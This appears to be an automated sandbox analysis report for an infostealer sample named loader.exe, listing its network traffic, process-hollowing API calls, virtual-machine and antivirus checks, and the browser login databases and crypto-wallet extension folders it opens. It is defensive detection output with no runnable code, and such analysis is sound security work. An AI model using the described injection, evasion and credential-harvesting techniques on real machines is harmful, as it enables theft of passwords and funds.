        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49738 version: TLS 1.2
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00434400 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_00434400
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00434400 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_00434400
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004345C0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,5_2_004345C0
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0024F4D00_2_0024F4D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_002534D00_2_002534D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_002515A00_2_002515A0
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0024F9800_2_0024F980
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0024CE700_2_0024CE70
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_002486C00_2_002486C0
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0024D7F00_2_0024D7F0
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00261FD20_2_00261FD2
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0024F4D02_2_0024F4D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_002534D02_2_002534D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_002515A02_2_002515A0
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0024F9802_2_0024F980
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0024CE702_2_0024CE70
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_002486C02_2_002486C0
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0024D7F02_2_0024D7F0
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_00261FD22_2_00261FD2
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004240D05_2_004240D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004399205_2_00439920
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004419205_2_00441920
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004422205_2_00442220
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004093505_2_00409350
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0040E3CA5_2_0040E3CA
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00428BA05_2_00428BA0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0040A4405_2_0040A440
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0040D4C55_2_0040D4C5
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004044905_2_00404490
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004194B05_2_004194B0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004396005_2_00439600
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0042E6245_2_0042E624
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00425F6F5_2_00425F6F
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00421FD05_2_00421FD0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0043BFE05_2_0043BFE0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041C84E5_2_0041C84E
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004270545_2_00427054
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041B8625_2_0041B862
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004030D05_2_004030D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0042A8D05_2_0042A8D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004210A05_2_004210A0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041A9005_2_0041A900
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004051085_2_00405108
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004061C05_2_004061C0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004291C45_2_004291C4
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004199D15_2_004199D1
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004341E05_2_004341E0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0040DA6F5_2_0040DA6F
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004222205_2_00422220
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00432AE05_2_00432AE0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004072F05_2_004072F0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00403AF05_2_00403AF0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00420A805_2_00420A80
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00429B615_2_00429B61
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00405B735_2_00405B73
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0042531F5_2_0042531F
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041A3F95_2_0041A3F9
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041F3B05_2_0041F3B0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041A4625_2_0041A462
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0040BC005_2_0040BC00
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004204105_2_00420410
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00441C105_2_00441C10
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004284205_2_00428420
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0042B4AF5_2_0042B4AF
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00424CB05_2_00424CB0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004405105_2_00440510
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004265305_2_00426530
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00427DC65_2_00427DC6
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004405D05_2_004405D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0042BD805_2_0042BD80
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041DE505_2_0041DE50
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00406E605_2_00406E60
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00429E605_2_00429E60
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00427E655_2_00427E65
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00404E705_2_00404E70
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00407E005_2_00407E00
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0042AE3D5_2_0042AE3D
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0043CEC05_2_0043CEC0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0040B6E05_2_0040B6E0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041AEE85_2_0041AEE8
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0042A6925_2_0042A692
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004236A05_2_004236A0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0043C7505_2_0043C750
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00409F605_2_00409F60
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0042CF605_2_0042CF60
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041CF785_2_0041CF78
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0041AF7A5_2_0041AF7A
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0042E61D5_2_0042E61D
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00441F205_2_00441F20
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_004067D05_2_004067D0
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00438FA05_2_00438FA0
        Source: C:\Users\user\Desktop\loader.exeCode function: String function: 002555C0 appears 66 times
        Source: C:\Users\user\Desktop\loader.exeCode function: String function: 00408AE0 appears 37 times
        Source: C:\Users\user\Desktop\loader.exeCode function: String function: 00258178 appears 36 times
        Source: loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: loader.exeStatic PE information: Section: .coS ZLIB complexity 1.0003344608239095
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/0@1/1
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00439920 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,5_2_00439920
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
        Source: loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: loader.exe, 00000005.00000003.1709216962.00000000055F6000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1731427245.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: loader.exeReversingLabs: Detection: 47%
        Source: C:\Users\user\Desktop\loader.exeFile read: C:\Users\user\Desktop\loader.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: loader.exeStatic PE information: section name: .00cfg
        Source: loader.exeStatic PE information: section name: .coS
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00254BC5 push ecx; ret 0_2_00254BD8
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_00254BC5 push ecx; ret 2_2_00254BD8
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_00418771 push ds; iretd 5_2_00418786
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00254CA2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00254CA2
        Source: C:\Users\user\Desktop\loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\loader.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\loader.exe TID: 7392Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\loader.exe TID: 7388Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0025C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0025C7DB
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0025C72A FindFirstFileExW,2_2_0025C72A
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0025C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0025C7DB
        Source: loader.exe, 00000005.00000003.1863948333.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1863948333.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\loader.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\loader.exeCode function: 5_2_0043E990 LdrInitializeThunk,5_2_0043E990
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00255444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00255444
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0024CD10 mov eax, dword ptr fs:[00000030h]0_2_0024CD10
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0026B18D mov edi, dword ptr fs:[00000030h]0_2_0026B18D
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0024BD50 mov edi, dword ptr fs:[00000030h]0_2_0024BD50
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0024CD10 mov eax, dword ptr fs:[00000030h]2_2_0024CD10
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_0024BD50 mov edi, dword ptr fs:[00000030h]2_2_0024BD50
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00259F90 GetProcessHeap,0_2_00259F90
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00255438 SetUnhandledExceptionFilter,0_2_00255438
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00255444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00255444
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00257DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00257DCA
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00254AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00254AD9
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_00255438 SetUnhandledExceptionFilter,2_2_00255438
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_00255444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00255444
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_00257DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00257DCA
        Source: C:\Users\user\Desktop\loader.exeCode function: 2_2_00254AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00254AD9

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0026B18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0026B18D
        Source: C:\Users\user\Desktop\loader.exeMemory written: C:\Users\user\Desktop\loader.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"Jump to behavior
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00255200 cpuid 0_2_00255200
        Source: C:\Users\user\Desktop\loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_002558C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_002558C5
        Source: C:\Users\user\Desktop\loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: loader.exe, 00000005.00000002.1865344329.00000000055C8000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1805175031.00000000055CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Users\user\Desktop\loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: loader.exe PID: 7372, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
